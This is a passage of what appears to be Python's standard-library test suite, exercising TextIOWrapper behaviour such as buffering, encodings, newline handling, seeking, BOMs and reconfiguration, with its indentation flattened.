t = self.TextIOWrapper(b, encoding="utf-8", newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, encoding="utf-8", newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
t.reconfigure(line_buffering=True)
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
with warnings.catch_warnings():
warnings.simplefilter("ignore", EncodingWarning)
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b, encoding="locale")
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b, encoding="locale")
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
with warnings.catch_warnings():
warnings.simplefilter("ignore", EncodingWarning)
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.TextIOWrapper(rawio, encoding="utf-8").xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(os_helper.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(os_helper.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
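# tell() must return stable cookies around writes and reads; while iterating
# with a for-loop it is expected to raise OSError (the read-ahead used by
# iteration makes the position unreliable), and to work again once iteration
# ends.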
f = self.open(os_helper.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(os_helper.TESTFN, "wb") as f:
f.write(line*2)
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(os_helper.TESTFN, "wb") as f:
f.write(data)
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
# Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(os_helper.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(os_helper.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(os_helper.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_multibyte_seek_and_tell(self):
f = self.open(os_helper.TESTFN, "w", encoding="euc_jp")
f.write("AB\n\u3046\u3048\n")
f.close()
f = self.open(os_helper.TESTFN, "r", encoding="euc_jp")
self.assertEqual(f.readline(), "AB\n")
p0 = f.tell()
self.assertEqual(f.readline(), "\u3046\u3048\n")
p1 = f.tell()
f.seek(p0)
self.assertEqual(f.readline(), "\u3046\u3048\n")
self.assertEqual(f.tell(), p1)
f.close()
def test_seek_with_encoder_state(self):
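# euc_jis_2004 has a stateful encoder (a base character can combine with a
# following combining mark), so tell()/seek() presumably have to snapshot and
# restore the encoder state for the '\u0300' written after the seek to encode
# correctly.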
f = self.open(os_helper.TESTFN, "w", encoding="euc_jis_2004")
f.write("\u00e6\u0300")
p0 = f.tell()
f.write("\u00e6")
f.seek(p0)
f.write("\u0300")
f.close()
f = self.open(os_helper.TESTFN, "r", encoding="euc_jis_2004")
self.assertEqual(f.readline(), "\u00e6\u0300\u0300")
f.close()
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable(), encoding="utf-8")
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"), encoding="utf-8")
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"), encoding="utf-8")
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# Read in amounts equal to TextIOWrapper._CHUNK_SIZE, which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"), encoding="utf-8")
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="utf-8")
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="utf-8")
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO(), encoding="utf-8")
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
self.assertEqual(f.errors, "strict")
with self.open(os_helper.TESTFN, "w", encoding="utf-8", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
@threading_helper.requires_working_threading()
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(os_helper.TESTFN, "w", encoding="utf-8", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with threading_helper.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(os_helper.TESTFN, encoding="utf-8") as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata), encoding="utf-8")
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'), encoding="utf-8")
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'), encoding="utf-8")
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'), encoding="utf-8")
self.assertRaises(TypeError, t.read)
def test_illegal_encoder(self):
# Issue 31271: Calling write() while the return value of encoder's
# encode() is invalid shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() while the return value of decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOWrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
def test_reconfigure_encoding_read(self):
# latin1 -> utf8
# (latin1 can decode utf-8 encoded string)
data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
raw = self.BytesIO(data)
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
self.assertEqual(txt.readline(), 'abc\xe9\n')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(encoding='utf-8')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(newline=None)
def test_reconfigure_write_fromascii(self):
# ascii has a specific encodefunc in the C implementation,
# but utf-8-sig does not. Make sure that we get rid of the
# cached encodefunc when we switch encoders.
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('foo\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('\xe9\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
def test_reconfigure_write(self):
# latin -> utf8
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
txt.write('abc\xe9\n')
txt.reconfigure(encoding='utf-8')
self.assertEqual(raw.getvalue(), b'abc\xe9\n')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')
# ascii -> utf-8-sig: ensure that no BOM is written in the middle of
# the file
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
def test_reconfigure_write_non_seekable(self):
raw = self.BytesIO()
raw.seekable = lambda: False
raw.seek = None
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
# If the raw stream is not seekable, there'll be a BOM
self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
def test_reconfigure_defaults(self):
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
txt.reconfigure(encoding=None)
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.write('LF\n')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.reconfigure(errors='ignore')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'ignore')
txt.write('CRLF\n')
txt.reconfigure(encoding='utf-8', newline=None)
self.assertEqual(txt.errors, 'strict')
txt.seek(0)
self.assertEqual(txt.read(), 'LF\nCRLF\n')
